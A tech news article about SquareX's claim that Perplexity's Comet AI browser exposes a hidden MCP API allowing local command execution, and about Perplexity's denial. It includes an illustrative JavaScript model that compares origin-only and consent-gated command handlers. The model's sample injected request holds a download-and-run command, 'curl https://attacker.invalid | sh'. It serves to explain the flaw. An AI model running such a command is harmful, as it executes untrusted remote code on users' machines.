- SquareX accused Perplexity’s Comet browser of exposing a hidden MCP API that could allow local command execution
- Perplexity dismissed these claims as “entirely false”, pointing out that the API requires developer mode, user consent and manual loading.
- SquareX hit back, saying Comet was silently updated after its proof of concept and that external researchers replicated the attack.
Cybersecurity firm SquareX recently accused Perplexity of shipping a major vulnerability in its AI browser, Comet. Perplexity has now responded, saying the research report was “entirely false” and part of a growing problem of “fake security research”.
SquareX said it had found a hidden API in the Comet browser capable of executing local commands. According to SquareX, this API, which it calls the MCP API, lets Comet’s built-in extensions execute arbitrary local commands on users’ devices, a capability that traditional browsers explicitly prohibit.
SquareX said the API lives in Comet’s Agentic extension and can be triggered from the perplexity.ai page, meaning that anyone who compromised the Perplexity site could reach every Comet user’s device.
Perplexity’s response
Kabilan Sakthivel, a researcher at SquareX, said failing to adhere to the strict security controls the industry has evolved toward “reverses the course of decades of browser security principles established by vendors like Chrome, Safari and Firefox.”
But Perplexity disagrees, noting in a written response sent to TechRadar Pro by spokesperson Jesse Dwyer that the report is “entirely false.”
The company added that reproducing the issue requires a human user, not Comet Assistant, to do the work, and that developer mode must be enabled.
“To reproduce this, the human user must enable developer mode and manually load the malware into Comet,” it says.
Perplexity also said the claim that Comet fails to explicitly obtain user consent for local system access is “categorically false.”
“When installing local MCPs, we need user consent: users are the ones who configure it and call the MCP API. They specify exactly which command to run,” Dwyer wrote. “Any additional commands from the MCP (e.g. calling an AI tool) also require confirmation from the user.”
Additionally, Perplexity claims that what SquareX describes as a “hidden API” is actually “simply how Comet can run MCPs locally”, with user permission and consent obtained beforehand.
“This is the second time SquareX has presented false security research. The first one we also proved was false,” he noted.
Dwyer also claims that SquareX did not submit a report as it claims. “Instead, they sent a link to a Google Doc, with no context and no access. We informed them that we could not open the Google Docs, requested access to the Google Docs, and never heard back or received access to the documents.”
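The disagreement above comes down to what sits between a web page and the local command executor. The following is an added illustration written for this article, not code from Comet, Perplexity or SquareX: it models an extension-side message handler that lets a page ask the browser to run a local command, and contrasts an origin-only gate (SquareX’s description: a compromise of the trusted site reaches every user) with the gating Perplexity describes (developer mode plus explicit per-command user consent). The message shape, the origin constant, the function names and the sample request are all assumptions, and the executor only records commands rather than spawning them.

```javascript
// Added illustration, not code from Comet, Perplexity or SquareX. Names,
// message shape and the sample request below are assumptions.

const TRUSTED_ORIGIN = 'https://www.perplexity.ai';

// Stand-in for the host executor: it records commands instead of spawning them.
function makeExecutor() {
  const log = [];
  return { run: (cmd) => { log.push(cmd); return { ok: true, cmd }; }, log };
}

// Weak gate: the only check is that the message came from the trusted origin.
// Any script running on that origin (including one injected after a site
// compromise) can therefore reach the executor on every user's machine.
function weakHandler(executor) {
  return function onMessage(msg, sender) {
    if (sender.origin !== TRUSTED_ORIGIN) return { error: 'untrusted origin' };
    if (msg.type !== 'run_local_command') return { error: 'unknown message' };
    return executor.run(msg.command);
  };
}

// Hardened gate: origin check, a user-controlled developer-mode switch, and an
// allowlist of commands the user configured themselves; anything else needs an
// explicit confirmation prompt before it is added to the allowlist.
function hardenedHandler(executor, state) {
  return function onMessage(msg, sender) {
    if (sender.origin !== TRUSTED_ORIGIN) return { error: 'untrusted origin' };
    if (msg.type !== 'run_local_command') return { error: 'unknown message' };
    if (!state.developerMode) return { error: 'Local MCP is not enabled' };
    if (!state.approvedCommands.has(msg.command)) {
      if (!state.confirm(msg.command)) return { error: 'consent denied' };
      state.approvedCommands.add(msg.command);
    }
    return executor.run(msg.command);
  };
}

// A request as an injected script on the trusted origin would send it
// (constructed sample, not a real payload).
const injectedRequest = {
  msg: { type: 'run_local_command', command: 'curl https://attacker.invalid | sh' },
  sender: { origin: TRUSTED_ORIGIN },
};

// Run the same request through both gates and report what reached the executor.
function demo() {
  const weakExec = makeExecutor();
  const weak = weakHandler(weakExec)(injectedRequest.msg, injectedRequest.sender);

  const hardExec = makeExecutor();
  const state = {
    developerMode: false,
    approvedCommands: new Set(['node ./my-mcp-server.js']), // user-configured local MCP
    confirm: () => false, // the user declines anything they did not configure
  };
  const hard = hardenedHandler(hardExec, state);
  const hardOff = hard(injectedRequest.msg, injectedRequest.sender);
  state.developerMode = true;
  const hardOnDenied = hard(injectedRequest.msg, injectedRequest.sender);
  const hardOnApproved = hard(
    { type: 'run_local_command', command: 'node ./my-mcp-server.js' },
    injectedRequest.sender,
  );

  return {
    weak, weakRan: weakExec.log,
    hardOff, hardOnDenied, hardOnApproved, hardRan: hardExec.log,
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The point of the comparison is that an origin check alone makes the web origin a single point of failure for every installed browser, while the developer-mode switch and the per-command allowlist keep the decision with the user on each machine. A real implementation would also have to make sure the allowlist cannot be written by page script, which this model does not address.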
SquareX also fights back
But SquareX isn’t backing down either.
The company also said it spotted Perplexity performing a “silent update” of Comet, after which the same PoC now returns “Local MCP is not enabled.”
It claims that three external researchers reproduced the attack and that Perplexity fixed it a few hours ago.
“This is great news from a security perspective and we are happy that our research can help make the AI Browser more secure,” SquareX concluded, adding that it has not received a response from Perplexity regarding its VDP submission.